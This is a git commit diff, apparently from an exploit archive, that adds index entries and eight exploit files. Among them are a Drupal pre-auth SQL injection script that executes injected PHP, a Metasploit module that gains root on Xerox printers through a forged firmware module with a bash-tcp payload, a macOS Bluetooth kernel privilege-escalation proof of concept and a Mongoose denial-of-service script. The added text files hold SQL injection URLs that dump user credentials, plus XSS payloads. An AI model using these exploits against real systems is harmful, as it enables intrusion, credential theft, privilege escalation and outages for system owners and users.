Updated 11_05_2014
This commit is contained in:
parent
79ad0e1a38
commit
9fc5498a7e
9 changed files with 346 additions and 0 deletions
|
@ -31660,3 +31660,11 @@ id,file,description,date,author,platform,type,port
|
|||
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
|
||||
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
|
||||
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
|
||||
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
|
||||
35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100
|
||||
35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
|
||||
35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0
|
||||
35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
|
||||
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
|
||||
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
|
||||
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
7
platforms/asp/webapps/35154.txt
Executable file
7
platforms/asp/webapps/35154.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45588/info
|
||||
|
||||
Sigma Portal is prone to a denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
|
||||
|
||||
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
|
98
platforms/hardware/remote/35151.rb
Executable file
98
platforms/hardware/remote/35151.rb
Executable file
|
@ -0,0 +1,98 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = GoodRanking
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
|
||||
'Description' => %{
|
||||
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
|
||||
supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
|
||||
commands under root priviages.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Deral "Percentx" Heiland',
|
||||
'Pete "Bokojan" Arzamendi'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['BID', '52483'],
|
||||
['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
|
||||
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'License' => MSF_LICENSE,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 512,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic bash-tcp'
|
||||
}
|
||||
},
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DisclosureDate' => 'Mar 07 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9100)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{rhost}:#{rport} - Sending print job...")
|
||||
firmcode = '%%XRXbegin' + "\x0A"
|
||||
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
|
||||
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
|
||||
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
|
||||
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
|
||||
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
|
||||
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
|
||||
firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
|
||||
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
|
||||
firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
|
||||
firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
|
||||
firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
|
||||
firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
|
||||
firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
|
||||
firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
|
||||
firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
|
||||
firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
|
||||
firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
|
||||
firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
|
||||
firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
|
||||
firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
|
||||
firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
|
||||
firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
|
||||
firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
|
||||
firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
|
||||
firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
|
||||
firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
|
||||
firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
|
||||
firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
|
||||
|
||||
begin
|
||||
connect
|
||||
sock.put(firmcode)
|
||||
handler
|
||||
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
|
||||
print_error("#{rhost}:#{rport} - #{e.message}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
end
|
92
platforms/osx/dos/35153.c
Executable file
92
platforms/osx/dos/35153.c
Executable file
|
@ -0,0 +1,92 @@
|
|||
/*
|
||||
* pwn.c, by @rpaleari and @joystick
|
||||
*
|
||||
* This PoC exploits a missing sign check in
|
||||
* IOBluetoothHCIUserClient::SimpleDispatchWL().
|
||||
*
|
||||
* Tested on Mac OS X Mavericks (10.9.4/10.9.5).
|
||||
*
|
||||
* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
|
||||
*
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <mach/mach.h>
|
||||
#include <mach/vm_map.h>
|
||||
|
||||
#include <IOKit/IOKitLib.h>
|
||||
|
||||
uint64_t payload() {
|
||||
/* Your payload goes here. */
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
/* Map our landing page (kernel will jump at tgt+7) */
|
||||
vm_address_t tgt = 0x0000048800000000;
|
||||
vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
|
||||
vm_protect(mach_task_self(), tgt, 0x1000, 0,
|
||||
VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
|
||||
memset((void *)tgt, 0, 0x1000);
|
||||
|
||||
/* Prepare payload */
|
||||
char *target = (char *)tgt;
|
||||
|
||||
/* mov rax, payload */
|
||||
target[7] = 0x48;
|
||||
target[8] = 0xb8;
|
||||
*((uint64_t *)(&target[9])) = (uint64_t) payload;
|
||||
|
||||
/* jmp rax */
|
||||
target[17] = 0xff;
|
||||
target[18] = 0xe0;
|
||||
|
||||
printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);
|
||||
printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);
|
||||
|
||||
/* Find the vulnerable service */
|
||||
io_service_t service =
|
||||
IOServiceGetMatchingService(kIOMasterPortDefault,
|
||||
IOServiceMatching("IOBluetoothHCIController"));
|
||||
|
||||
if (!service) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Connect to the vulnerable service */
|
||||
io_connect_t port = (io_connect_t) 0;
|
||||
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
|
||||
IOObjectRelease(service);
|
||||
if (kr != kIOReturnSuccess) {
|
||||
return kr;
|
||||
}
|
||||
|
||||
printf(" [+] Opened connection to service on port: %d\n", port);
|
||||
|
||||
/* The first 8 bytes must be 0, so we don't have to handle following
|
||||
parameters */
|
||||
char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
/* Don't really matter for the exploit (ignored due to the 0s above) */
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
|
||||
"\x80\xff\xff\xff"
|
||||
/* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
|
||||
memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
|
||||
need to be adjusted on other Mavericks versions. */
|
||||
"\xa8\xb6\xf5\xff\x80\xff\xff\xff";
|
||||
|
||||
printf(" [+] Launching exploit!\n");
|
||||
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
|
||||
(uint32_t) 0, /* Selector */
|
||||
NULL, 0, /* input, inputCnt */
|
||||
(const void*) a, /* inputStruct */
|
||||
sizeof(a), /* inputStructCnt */
|
||||
NULL, NULL, NULL, NULL); /* Output stuff */
|
||||
|
||||
/* Exec shell here after payload returns */
|
||||
|
||||
return IOServiceClose(port);
|
||||
}
|
86
platforms/php/webapps/35150.php
Executable file
86
platforms/php/webapps/35150.php
Executable file
|
@ -0,0 +1,86 @@
|
|||
<?php
|
||||
// _____ __ __ _ _______
|
||||
// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
|
||||
// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
|
||||
// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
|
||||
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
|
||||
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
|
||||
//
|
||||
// created by Stefan Horst <stefan.horst@sektioneins.de>
|
||||
// and Stefan Esser <stefan.esser@sektioneins.de>
|
||||
//·
|
||||
|
||||
include 'common.inc';
|
||||
include 'password.inc';
|
||||
|
||||
// set values
|
||||
$user_id = 0;
|
||||
$user_name = '';
|
||||
|
||||
$code_inject = 'phpinfo();session_destroy();die("");';
|
||||
|
||||
$url = isset($argv[1])?$argv[1]:'';
|
||||
$code = isset($argv[2])?$argv[2]:'';
|
||||
|
||||
if ($url == '-h') {
|
||||
echo "usage:\n";
|
||||
echo $argv[0].' $url [$code|$file]'."\n";
|
||||
die();
|
||||
}
|
||||
|
||||
if (empty($url) || strpos($url,'https') === False) {
|
||||
echo "please state the cookie url. It works only with https urls.\n";
|
||||
die();
|
||||
}
|
||||
|
||||
if (!empty($code)) {
|
||||
if (is_file($code)) {
|
||||
$code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
|
||||
} else {
|
||||
$code_inject = $code;
|
||||
}
|
||||
}
|
||||
|
||||
$code_inject = rtrim($code_inject,';');
|
||||
$code_inject .= ';session_destroy();die("");';
|
||||
|
||||
if (strpos($url, 'www.') === 0) {
|
||||
$url = substr($url, 4);
|
||||
}
|
||||
|
||||
$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
|
||||
$_SESSION['build_info']['args'][0] = &$_SESSION['string'];
|
||||
|
||||
list( , $session_name) = explode('://', $url, 2);
|
||||
|
||||
// use insecure cookie with sql inj.
|
||||
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
|
||||
$password = user_hash_password('test');
|
||||
|
||||
$session_id = drupal_random_key();
|
||||
$sec_ssid = drupal_random_key();
|
||||
|
||||
$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION)));
|
||||
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- ";
|
||||
|
||||
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
|
||||
|
||||
$ch = curl_init($url);
|
||||
|
||||
curl_setopt($ch,CURLOPT_HEADER,True);
|
||||
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
|
||||
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
|
||||
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
|
||||
|
||||
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
|
||||
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Accept-Language: en-US,en;q=0.5'
|
||||
));
|
||||
|
||||
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
|
||||
|
||||
$output = curl_exec($ch);
|
||||
|
||||
curl_close($ch);
|
||||
|
||||
echo $output;
|
16
platforms/php/webapps/35155.txt
Executable file
16
platforms/php/webapps/35155.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/45594/info
|
||||
|
||||
CruxCMS is prone to multiple input-validation vulnerabilities, including multiple security-bypass issues, multiple arbitrary-file-upload issues, multiple SQL-injection issues, a local file-include issue, a cross-site-scripting issue and multiple information-disclosure issues. These issues occur because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues may allow an unauthorized user to view files and execute local scripts, execute arbitrary script code, bypass certain security restrictions, access or modify data, exploit latent vulnerabilities in the underlying database, gain administrative access, steal cookie-based authentication credentials, and launch other attacks.
|
||||
|
||||
CruxCMS 3.0.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cruxcms.3.0.0/search.php?search=_&max=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,1+FROM+cruxcms_users
|
||||
http://www.example.com/cruxcms.3.0.0/links.php?max=1+UNION+ALL+SELECT+1,1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,0x596573+FROM+cruxcms_users
|
||||
http://www.example.com/cruxcms.3.0.0/includes/template.php?style=../white.gif
|
||||
http://www.example.com/cruxcms.3.0.0/manager/login.php?message=<script>alert(123);</script>
|
||||
http://www.example.com/cruxcms.3.0.0/manager/switcher.php?style[]
|
||||
http://www.example.com/cruxcms.3.0.0/search.php?search[]
|
||||
http://www.example.com/cruxcms.3.0.0/manager/filetypes.php
|
||||
http://www.example.com/cruxcms.3.0.0/styles/andreas01.php
|
11
platforms/php/webapps/35156.txt
Executable file
11
platforms/php/webapps/35156.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/45600/info
|
||||
|
||||
Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cpg.1.5.10/help.php?base=1
|
||||
&h=czozMzoiPHNjcmlwdD5hbGVydCgnaGVhZGVyJyk7PC9zY3JpcHQ%2bIjs
|
||||
&t=czozMToiPHNjcmlwdD5hbGVydCgndGV4dCcpOzwvc2NyaXB0PiI7
|
9
platforms/php/webapps/35157.html
Executable file
9
platforms/php/webapps/35157.html
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45600/info
|
||||
|
||||
Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html><body><center> <form action="http://localhost/cpg.1.5.10/searchnew.php" method="post"> <input type="hidden" name="insert" value="1"> <input type="hidden" name="pics[]" value="222"> <input type="hidden" name="picfile_222" value="PGJvZHkgb25sb2FkPWFsZXJ0KDEyMyk7Pg"> <input type="submit" value="Test!"> </form> </center></body></html>
|
19
platforms/windows/dos/35158.py
Executable file
19
platforms/windows/dos/35158.py
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/45602/info
|
||||
|
||||
Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
|
||||
|
||||
Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.
|
||||
|
||||
Mongoose 2.11 is vulnerable; other versions may also be affected.
|
||||
|
||||
import socket
|
||||
|
||||
host = 'localhost'
|
||||
port = 8080
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(8)
|
||||
s.connect((host, port))
|
||||
s.send('GET / HTTP/1.1\r\n'
|
||||
'Host: ' + host + '\r\n'
|
||||
'Content-Length: -2147483648\r\n\r\n')
|
Loading…
Add table
Reference in a new issue